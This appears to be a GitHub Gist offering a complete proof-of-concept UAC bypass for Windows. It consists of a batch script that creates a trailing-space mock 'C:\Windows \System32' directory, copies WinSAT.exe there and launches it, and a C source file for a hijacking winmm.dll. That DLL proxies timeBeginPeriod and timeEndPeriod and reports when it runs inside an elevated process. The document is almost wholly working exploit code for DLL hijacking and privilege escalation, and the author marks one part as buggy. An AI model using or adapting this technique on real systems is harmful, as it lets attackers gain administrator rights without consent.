Last active
July 27, 2023 13:00
-
-
Save Barakat/651e91123b6809ebebb9af753edc0b10 to your computer and use it in GitHub Desktop.
UAC bypass complete POC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cl /MT /LD winmm.c User32.lib Advapi32.lib | |
mkdir "\\?\C:\Windows " | |
mkdir "\\?\C:\Windows \System32" | |
copy "C:\Windows\System32\WinSAT.exe" "C:\Windows \System32\" | |
copy "winmm.dll" "C:\Windows \System32\" | |
"C:\Windows \System32\WinSAT.exe" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// See the artical https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e | |
#define MMNOTIMER | |
#include <windows.h> | |
static HMODULE winmm; | |
static MMRESULT (*timeBeginPeriod_real)(UINT uPeriod); | |
static MMRESULT (*timeEndPeriod_real)(UINT uPeriod); | |
__declspec(dllexport) | |
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) | |
{ | |
(void) hinstDLL; | |
(void) lpvReserved; | |
if (fdwReason == DLL_PROCESS_ATTACH) | |
{ | |
HANDLE token; | |
TOKEN_ELEVATION token_elevation; | |
DWORD token_elevation_size; | |
MessageBoxW(NULL, L"DLL has been attached to the process", L"Hijacker", MB_OK); | |
OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token); | |
token_elevation_size = sizeof(token_elevation); | |
GetTokenInformation(token, TokenElevation, &token_elevation, sizeof(token_elevation), &token_elevation_size); | |
CloseHandle(token); | |
if (token_elevation.TokenIsElevated) | |
{ | |
MessageBoxW(NULL, L"DLL is running within an elevated process", L"Hijacker", MB_OK); | |
} | |
winmm = LoadLibraryW(L"C:\\Windows\\System32\\winmm.dll"); | |
timeBeginPeriod_real = (MMRESULT (*)(UINT)) GetProcAddress(winmm, "timeBeginPeriod"); | |
timeEndPeriod_real = (MMRESULT (*)(UINT)) GetProcAddress(winmm, "timeEndPeriod"); | |
} | |
else if (fdwReason == DLL_PROCESS_DETACH) | |
{ | |
FreeLibrary(winmm); | |
} | |
} | |
// There is some bug here | |
__declspec(dllexport) | |
MMRESULT WINAPI timeBeginPeriod(UINT uPeriod) | |
{ | |
return timeBeginPeriod_real(uPeriod); | |
} | |
__declspec(dllexport) | |
MMRESULT WINAPI timeEndPeriod(UINT uPeriod) | |
{ | |
return timeEndPeriod_real(uPeriod); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment